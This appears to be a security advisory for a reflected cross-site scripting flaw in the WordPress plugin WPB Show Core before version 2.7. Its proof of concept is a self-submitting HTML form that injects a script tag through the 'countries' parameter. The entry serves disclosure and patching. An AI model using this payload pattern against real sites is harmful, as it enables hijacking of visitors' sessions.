WordPress Plugin Vulnerabilities

WPB Show Core < 2.7 - Reflected XSS

Description

The plugin does not sanitise and escape the parameters before outputting it back in the response of an unauthenticated request, leading to a Reflected Cross-Site Scripting

Proof of Concept

Open an HTML file containing the following:

```
<html>
  <body>
    <form action="https://example.com/wp-content/plugins/wpb-show-core/auto-suggest-categories/subscribe.php" id="hack" method="POST">
      <input type="hidden" name="firstname" value="test" />
      <input type="hidden" name="lastname" value="test2" />    
      <input type="hidden" name="countries" value='xxxxxx"><script>alert(/XSS/)</script>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>

  <script>
    var form1 = document.getElementById('hack');
    form1.submit();
</script>
</html>
```

Affects Plugins

Fixed in 2.7

References

Classification

Type
XSS
CWE

Miscellaneous

Original Researcher
Bob Matyas
Submitter
Bob Matyas
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2024-03-18 (about 1 months ago)
Added
2024-03-18 (about 1 months ago)
Last Updated
2024-03-18 (about 1 months ago)

Other